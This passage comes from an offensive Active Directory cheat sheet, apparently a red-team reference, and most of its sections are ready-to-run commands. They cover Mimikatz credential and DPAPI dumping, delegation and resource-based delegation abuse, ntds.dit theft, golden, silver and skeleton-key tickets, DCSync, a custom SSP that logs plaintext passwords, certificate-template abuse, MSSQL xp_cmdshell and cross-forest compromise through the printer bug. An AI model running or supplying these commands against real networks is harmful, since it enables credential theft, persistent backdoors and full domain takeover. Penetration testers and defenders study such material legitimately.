    781   #Check if current user has already an SPN setted
    782   Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
    783 
    784   #Force set the SPN on the account:
    785   Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}
    786   ```
    787 
    788 Finally use any tool from before to grab the hash and kerberoast it!
    789 
    790 ### Abusing Shadow Copies
    791 
    792 If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.
    793 
    794 ```powershell
    795 #List shadow copies using vssadmin (Needs Admnistrator Access)
    796 vssadmin list shadows
    797 
    798 #List shadow copies using diskshadow
    799 diskshadow list shadows all
    800 
    801 #Make a symlink to the shadow copy and access it
    802 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
    803 ```
    804 
    805 1. You can dump the backuped SAM database and harvest credentials.
    806 2. Look for DPAPI stored creds and decrypt them.
    807 3. Access backuped sensitive files.
    808 
    809 ### List and Decrypt Stored Credentials using Mimikatz
    810 
    811 Usually encrypted credentials are stored in:
    812 
    813 - `%appdata%\Microsoft\Credentials`
    814 - `%localappdata%\Microsoft\Credentials`
    815 
    816 ```powershell
    817 #By using the cred function of mimikatz we can enumerate the cred object and get information about it:
    818 dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
    819 
    820 #From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
    821 #Lets enumerate the Master Key:
    822 dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
    823 
    824 #Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
    825 dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
    826 
    827 #We now have the masterkey in our local cache:
    828 dpapi::cache
    829 
    830 #Finally we can decrypt the credential using the cached masterkey:
    831 dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
    832 ```
    833 
    834 Detailed Article:
    835 [DPAPI all the things](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials)
    836 
    837 ### Unconstrained Delegation
    838 
    839 _WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a
    840 high value target or DA to connect to it, steal his TGT then ptt and impersonate him!_
    841 
    842 Using PowerView:
    843 
    844 ```powershell
    845 #Discover domain joined computers that have Unconstrained Delegation enabled
    846 Get-NetComputer -UnConstrained
    847 
    848 #List tickets and check if a DA or some High Value target has stored its TGT
    849 Invoke-Mimikatz -Command '"sekurlsa::tickets"'
    850 
    851 #Command to monitor any incoming sessions on our compromised server
    852 Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay
    853 <WaitInterval> -Verbose
    854 
    855 #Dump the tickets to disk:
    856 Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
    857 
    858 #Impersonate the user using ptt attack:
    859 Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'
    860 ```
    861 
    862 **Note:** We can also use Rubeus!
    863 
    864 ### Constrained Delegation
    865 
    866 Using PowerView and Kekeo:
    867 
    868 ```powershell
    869 #Enumerate Users and Computers with constrained delegation
    870 Get-DomainUser -TrustedToAuth
    871 Get-DomainComputer -TrustedToAuth
    872 
    873 #If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
    874 tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>
    875 
    876 #Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
    877 tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>
    878 
    879 #Finally use mimikatz to ptt the TGS
    880 Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
    881 ```
    882 
    883 _ALTERNATIVE:_
    884 Using Rubeus:
    885 
    886 ```powershell
    887 Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /ptt
    888 ```
    889 
    890 Now we can access the service as the impersonated user!
    891 
    892 :triangular_flag_on_post: **What if we have delegation rights for only a specific SPN? (e.g TIME):**
    893 
    894 In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
    895 
    896 ### Resource Based Constrained Delegation
    897 
    898 _WUT IS DIS?: \
    899 TL;DR \
    900 If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access._
    901 
    902 Tools we are going to use:
    903 
    904 - [PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon)
    905 - [Powermad](https://github.com/Kevin-Robertson/Powermad)
    906 - [Rubeus](https://github.com/GhostPack/Rubeus)
    907 
    908 First we need to enter the security context of the user/machine account that has the privileges over the object.
    909 If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
    910 
    911 Exploitation Example:
    912 
    913 ```powershell
    914 #Import Powermad and use it to create a new MACHINE ACCOUNT
    915 . .\Powermad.ps1
    916 New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
    917 
    918 #Import PowerView and get the SID of our new created machine account
    919 . .\PowerView.ps1
    920 $ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
    921 
    922 #Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
    923 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
    924 $SDBytes = New-Object byte[] ($SD.BinaryLength)
    925 $SD.GetBinaryForm($SDBytes, 0)
    926 
    927 #Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
    928 Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
    929 
    930 #After that we need to get the RC4 hash of the new machine account's password using Rubeus
    931 Rubeus.exe hash /password:'p@ssword!'
    932 
    933 #And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
    934 Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
    935 
    936 #Finally we can access the C$ drive of the target machine
    937 dir \\TargetMachine.wtver.domain\C$
    938 ```
    939 
    940 Detailed Articles:
    941 
    942 - [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
    943 - [RESOURCE-BASED CONSTRAINED DELEGATION ABUSE](https://blog.stealthbits.com/resource-based-constrained-delegation-abuse/)
    944 
    945 :exclamation: In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.
    946 
    947 ```powershell
    948 #Command on Rubeus
    949 Rubeus.exe tgtdeleg /nowrap
    950 ```
    951 
    952 Detailed Article:
    953 [Rubeus – Now With More Kekeo](https://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/)
    954 
    955 ### DNSAdmins Abuse
    956 
    957 _WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work._
    958 
    959 1. Enumerate the members of the DNSAdmins group:
    960    - PowerView: `Get-NetGroupMember -GroupName "DNSAdmins"`
    961    - AD Module: `Get-ADGroupMember -Identiny DNSAdmins`
    962 2. Once we found a member of this group we need to compromise it (There are many ways).
    963 3. Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges:
    964 
    965    ```powershell
    966    #Using dnscmd:
    967    dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
    968 
    969    #Restart the DNS Service:
    970    sc \\DNSServer stop dns
    971    sc \\DNSServer start dns
    972    ```
    973 
    974 ### Abusing Active Directory-Integraded DNS
    975 
    976 - [Exploiting Active Directory-Integrated DNS](https://blog.netspi.com/exploiting-adidns/)
    977 - [ADIDNS Revisited](https://blog.netspi.com/adidns-revisited/)
    978 - [Inveigh](https://github.com/Kevin-Robertson/Inveigh)
    979 
    980 ### Abusing Backup Operators Group
    981 
    982 _WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators
    983 group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC,
    984 extract the ntds.dit database file, dump the hashes and escalate our privileges to DA._
    985 
    986 1. Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
    987 
    988    ```powershell
    989    #Create a .txt file that will contain the shadow copy process script
    990    Script ->{
    991    set context persistent nowriters
    992    set metadata c:\windows\system32\spool\drivers\color\example.cab
    993    set verbose on
    994    begin backup
    995    add volume c: alias mydrive
    996 
    997    create
    998 
    999    expose %mydrive% w:
   1000    end backup
   1001    }
   1002 
   1003    #Execute diskshadow with our script as parameter
   1004    diskshadow /s script.txt
   1005    ```
   1006 
   1007 2. Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just
   1008    simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are
   1009    going to use [this](https://github.com/giuliano108/SeBackupPrivilege) amazing repo:
   1010 
   1011    ```powershell
   1012    #Importing both dlls from the repo using powershell
   1013    Import-Module .\SeBackupPrivilegeCmdLets.dll
   1014    Import-Module .\SeBackupPrivilegeUtils.dll
   1015 
   1016    #Checking if the SeBackupPrivilege is enabled
   1017    Get-SeBackupPrivilege
   1018 
   1019    #If it isn't we enable it
   1020    Set-SeBackupPrivilege
   1021 
   1022    #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
   1023    Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
   1024 
   1025    #Dump the SYSTEM hive
   1026    reg save HKLM\SYSTEM c:\temp\system.hive
   1027    ```
   1028 
   1029 3. Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
   1030 4. Use secretsdump.py from impacket and dump the hashes.
   1031 5. Use psexec or another tool of your choice to PTH and get Domain Admin access.
   1032 
   1033 ### Abusing Exchange
   1034 
   1035 - [Abusing Exchange one Api call from DA](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/)
   1036 - [CVE-2020-0688](https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys)
   1037 - [PrivExchange](https://github.com/dirkjanm/PrivExchange) Exchange your privileges for Domain Admin privs by abusing Exchange
   1038 
   1039 ### Weaponizing Printer Bug
   1040 
   1041 - [Printer Server Bug to Domain Administrator](https://www.dionach.com/blog/printer-server-bug-to-domain-administrator/)
   1042 - [NetNTLMtoSilverTicket](https://github.com/NotMedic/NetNTLMtoSilverTicket)
   1043 
   1044 ### Abusing ACLs
   1045 
   1046 - [Escalating privileges with ACLs in Active Directory](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
   1047 - [aclpwn.py](https://github.com/fox-it/aclpwn.py)
   1048 - [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn)
   1049 
   1050 ### Abusing IPv6 with mitm6
   1051 
   1052 - [Compromising IPv4 networks via IPv6](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/)
   1053 - [mitm6](https://github.com/fox-it/mitm6)
   1054 
   1055 ### SID History Abuse
   1056 
   1057 _WUT IS DIS?: If we manage to compromise a child domain of a forest and [SID filtering](https://www.itprotoday.com/windows-8/sid-filtering) isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of the [SID History](https://www.itprotoday.com/windows-8/sid-history) field on a kerberos TGT ticket, that defines the "extra" security groups and privileges._
   1058 
   1059 Exploitation example:
   1060 
   1061 ```powershell
   1062 #Get the SID of the Current Domain using PowerView
   1063 Get-DomainSID -Domain current.root.domain.local
   1064 
   1065 #Get the SID of the Root Domain using PowerView
   1066 Get-DomainSID -Domain root.domain.local
   1067 
   1068 #Create the Enteprise Admins SID
   1069 Format: RootDomainSID-519
   1070 
   1071 #Forge "Extra" Golden Ticket using mimikatz
   1072 kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
   1073 
   1074 #Inject the ticket into memory
   1075 kerberos::ptt \path\to\ticket\golden.kirbi
   1076 
   1077 #List the DC of the Root Domain
   1078 dir \\dc.root.domain.local\C$
   1079 
   1080 #Or DCsync and dump the hashes using mimikatz
   1081 lsadump::dcsync /domain:root.domain.local /all
   1082 ```
   1083 
   1084 Detailed Articles:
   1085 
   1086 - [Kerberos Golden Tickets are Now More Golden](https://adsecurity.org/?p=1640)
   1087 - [A Guide to Attacking Domain Trusts](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
   1088 
   1089 ### Exploiting SharePoint
   1090 
   1091 - [CVE-2019-0604](https://medium.com/@gorkemkaradeniz/sharepoint-cve-2019-0604-rce-exploitation-ab3056623b7d) RCE Exploitation \
   1092   [PoC](https://github.com/k8gege/CVE-2019-0604)
   1093 - [CVE-2019-1257](https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization) Code execution through BDC deserialization
   1094 - [CVE-2020-0932](https://www.zerodayinitiative.com/blog/2020/4/28/cve-2020-0932-remote-code-execution-on-microsoft-sharepoint-using-typeconverters) RCE using typeconverters \
   1095   [PoC](https://github.com/thezdi/PoC/tree/master/CVE-2020-0932)
   1096 
   1097 ### Zerologon
   1098 
   1099 - [Zerologon: Unauthenticated domain controller compromise](https://www.secura.com/whitepapers/zerologon-whitepaper): White paper of the vulnerability.
   1100 - [SharpZeroLogon](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon): C# implementation of the Zerologon exploit.
   1101 - [Invoke-ZeroLogon](https://github.com/BC-SECURITY/Invoke-ZeroLogon): PowerShell implementation of the Zerologon exploit.
   1102 - [Zer0Dump](https://github.com/bb00/zer0dump): Python implementation of the Zerologon exploit using the impacket library.
   1103 
   1104 ### PrintNightmare
   1105 
   1106 - [CVE-2021-34527](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527): Vulnerability details.
   1107 - [Impacket implementation of PrintNightmare](https://github.com/cube0x0/CVE-2021-1675): Reliable PoC of PrintNightmare using the impacket library.
   1108 - [C# Implementation of CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare): Reliable PoC of PrintNightmare written in C#.
   1109 
   1110 ### Active Directory Certificate Services
   1111 
   1112 **Check for Vulnerable Certificate Templates with:** [Certify](https://github.com/GhostPack/Certify)
   1113 
   1114 _Note: Certify can be executed with Cobalt Strike's `execute-assembly` command as well_
   1115 
   1116 ```powershell
   1117 .\Certify.exe find /vulnerable /quiet
   1118 ```
   1119 
   1120 Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights
   1121 allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.
   1122 
   1123 This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA")
   1124 and use the captured certificate with Rubeus to forge authentication.
   1125 
   1126 _Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target._
   1127 
   1128 Request the DA's Account Certificate with Certify
   1129 
   1130 ```powershell
   1131 .\Certify.exe request /template:<Template Name> /quiet /ca:"<CA Name>" /domain:<domain.com> /path:CN=Configuration,DC=<domain>,DC=com /altname:<Domain Admin AltName> /machine
   1132 ```
   1133 
   1134 This should return a valid certificate for the associated DA account.
   1135 
   1136 The exported `cert.pem` and `cert.key` files must be consolidated into a single `cert.pem` file, with one gap of whitespace between the `END RSA PRIVATE KEY` and the `BEGIN CERTIFICATE`.
   1137 
   1138 _Example of `cert.pem`:_
   1139 
   1140 ```
   1141 -----BEGIN RSA PRIVATE KEY-----
   1142 BIIEogIBAAk15x0ID[...]
   1143 [...]
   1144 [...]
   1145 -----END RSA PRIVATE KEY-----
   1146 
   1147 -----BEGIN CERTIFICATE-----
   1148 BIIEogIBOmgAwIbSe[...]
   1149 [...]
   1150 [...]
   1151 -----END CERTIFICATE-----
   1152 ```
   1153 
   1154 #Utilize `openssl` to Convert to PKCS #12 Format
   1155 
   1156 The `openssl` command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).
   1157 
   1158 ```bash
   1159 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
   1160 ```
   1161 
   1162 Once the `cert.pfx` file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, `certutil.exe`, Cobalt Strike's upload functionality, etc.)
   1163 
   1164 After the `cert.pfx` file has been uploaded to the compromised host, [Rubeus](https://github.com/GhostPack/Rubeus) can be used to request a Kerberos TGT for the DA account which will then be imported into memory.
   1165 
   1166 ```powershell
   1167 .\Rubeus.exe asktht /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /ptt
   1168 ```
   1169 
   1170 This should result in a successfully imported ticket, which then enables an attacker to perform various malicious acitivities under DA user context, such as performing a DCSync attack.
   1171 
   1172 ### No PAC
   1173 
   1174 - [sAMAccountname Spoofing](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) Exploitation of CVE-2021-42278 and CVE-2021-42287
   1175 - [Weaponisation of CVE-2021-42287/CVE-2021-42278](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) Exploitation of CVE-2021-42278 and CVE-2021-42287
   1176 - [noPAC](https://github.com/cube0x0/noPac) C# tool to exploit CVE-2021-42278 and CVE-2021-42287
   1177 - [sam-the-admin](https://github.com/WazeHell/sam-the-admin) Python automated tool to exploit CVE-2021-42278 and CVE-2021-42287
   1178 - [noPac](https://github.com/Ridter/noPac) Evolution of "sam-the-admin" tool
   1179 
   1180 ## Domain Persistence
   1181 
   1182 ### Golden Ticket Attack
   1183 
   1184 ```powershell
   1185 #Execute mimikatz on DC as DA to grab krbtgt hash:
   1186 Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName>
   1187 
   1188 #On any machine:
   1189 Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:
   1190 <HashOfkrbtgtAccount>   id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
   1191 ```
   1192 
   1193 ### DCsync Attack
   1194 
   1195 ```powershell
   1196 #DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
   1197 Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'
   1198 
   1199 #DCsync using secretsdump.py from impacket with NTLM authentication
   1200 secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm
   1201 
   1202 #DCsync using secretsdump.py from impacket with Kerberos Authentication
   1203 secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm
   1204 ```
   1205 
   1206 **Tip:** \
   1207  /ptt -> inject ticket on current running session \
   1208  /ticket -> save the ticket on the system for later use
   1209 
   1210 ### Silver Ticket Attack
   1211 
   1212 ```powershell
   1213 Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<TheTargetMachine> /service:
   1214 <ServiceType> /rc4:<TheSPN's Account NTLM Hash> /user:<UserToImpersonate> /ptt"'
   1215 ```
   1216 
   1217 [SPN List](https://adsecurity.org/?page_id=183)
   1218 
   1219 ### Skeleton Key Attack
   1220 
   1221 ```powershell
   1222 #Exploitation Command runned as DA:
   1223 Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN>
   1224 
   1225 #Access using the password "mimikatz"
   1226 Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
   1227 ```
   1228 
   1229 ### DSRM Abuse
   1230 
   1231 _WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!_
   1232 
   1233 ```powershell
   1234 #Dump DSRM password (needs DA privs):
   1235 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>
   1236 
   1237 #This is a local account, so we can PTH and authenticate!
   1238 #BUT we need to alter the behaviour of the DSRM account before pth:
   1239 #Connect on DC:
   1240 Enter-PSSession -ComputerName <DC's Name>
   1241 
   1242 #Alter the Logon behaviour on registry:
   1243 New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
   1244 
   1245 #If the property already exists:
   1246 Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
   1247 ```
   1248 
   1249 Then just PTH to get local admin access on DC!
   1250 
   1251 ### Custom SSP
   1252 
   1253 _WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!_
   1254 
   1255 From powershell:
   1256 
   1257 ```powershell
   1258 #Get current Security Package:
   1259 $packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty  'Security Packages'
   1260 
   1261 #Append mimilib:
   1262 $packages += "mimilib"
   1263 
   1264 #Change the new packages name
   1265 Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
   1266 Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages
   1267 
   1268 #ALTERNATIVE:
   1269 Invoke-Mimikatz -Command '"misc::memssp"'
   1270 ```
   1271 
   1272 Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log
   1273 
   1274 ## Cross Forest Attacks
   1275 
   1276 ### Trust Tickets
   1277 
   1278 _WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT._
   1279 
   1280 :warning: The access we will have will be limited to what our DA account is configured to have on the other Forest!
   1281 
   1282 - Using Mimikatz:
   1283 
   1284   ```powershell
   1285   #Dump the trust key
   1286   Invoke-Mimikatz -Command '"lsadump::trust /patch"'
   1287   Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
   1288 
   1289   #Forge an inter-realm TGT using the Golden Ticket attack
   1290   Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:
   1291   <OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:
   1292   <PathToSaveTheGoldenTicket>"'
   1293   ```
   1294 
   1295   :exclamation: Tickets -> .kirbi format
   1296 
   1297   Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource!
   1298 
   1299 - Using Rubeus:
   1300 
   1301   ```powershell
   1302   .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
   1303   ```
   1304 
   1305 ### Abuse MSSQL Servers
   1306 
   1307 - Enumerate MSSQL Instances: `Get-SQLInstanceDomain`
   1308 - Check Accessibility as current user:
   1309 
   1310   ```powershell
   1311   Get-SQLConnectionTestThreaded
   1312   Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
   1313   ```
   1314 
   1315 - Gather Information about the instance: `Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose`
   1316 - Abusing SQL Database Links: \
   1317   _WUT IS DIS?: A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust!_
   1318 
   1319 Check for existing Database Links:
   1320 
   1321 ```powershell
   1322 #Check for existing Database Links:
   1323 #PowerUpSQL:
   1324 Get-SQLServerLink -Instance <SPN> -Verbose
   1325 
   1326 #MSSQL Query:
   1327 select * from master..sysservers
   1328 ```
   1329 
   1330 Then we can use queries to enumerate other links from the linked Database:
   1331 
   1332 ```powershell
   1333 #Manualy:
   1334 select * from openquery("LinkedDatabase", 'select * from master..sysservers')
   1335 
   1336 #PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
   1337 Get-SQLServerLinkCrawl -Instance <SPN> -Verbose
   1338 
   1339 # Enable RPC Out (Required to Execute XP_CMDSHELL)
   1340 EXEC sp_serveroption 'sqllinked-hostname', 'rpc', 'true';
   1341 EXEC sp_serveroption 'sqllinked-hostname', 'rpc out', 'true';
   1342 select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc'',''true'';');
   1343 select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc out'',''true'';');
   1344 
   1345 #Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell
   1346 #Or if it is disabled enable it:
   1347 EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
   1348 ```
   1349 
   1350 Query execution:
   1351 
   1352 ```powershell
   1353 Get-SQLServerLinkCrawl -Instace <SPN> -Query "exec master..xp_cmdshell 'whoami'"
   1354 ```
   1355 
   1356 ### Breaking Forest Trusts
   1357 
   1358 _WUT IS DIS?: \
   1359 TL;DR \
   1360 If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest._
   1361 
   1362 Tools we are going to use:
   1363 
   1364 - [Rubeus](https://github.com/GhostPack/Rubeus)
   1365 - [SpoolSample](https://github.com/leechristensen/SpoolSample)
   1366 - [Mimikatz](https://github.com/gentilkiwi/mimikatz)
   1367 
   1368 Exploitation example:
   1369 
   1370 ```powershell
   1371 #Start monitoring for TGTs with rubeus:
   1372 Rubeus.exe monitor /interval:5 /filteruser:target-dc
   1373 
   1374 #Execute the printerbug to trigger the force authentication of the target DC to our machine
   1375 SpoolSample.exe target-dc.external.forest.local dc.compromised.domain.local
   1376 
   1377 #Get the base64 captured TGT from Rubeus and inject it into memory:
   1378 Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>
   1379 
   1380 #Dump the hashes of the target domain using mimikatz:
   1381 lsadump::dcsync /domain:external.forest.local /all
   1382 ```
   1383 
   1384 Detailed Articles:
   1385 
   1386 - [Not A Security Boundary: Breaking Forest Trusts](https://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/)
   1387 - [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)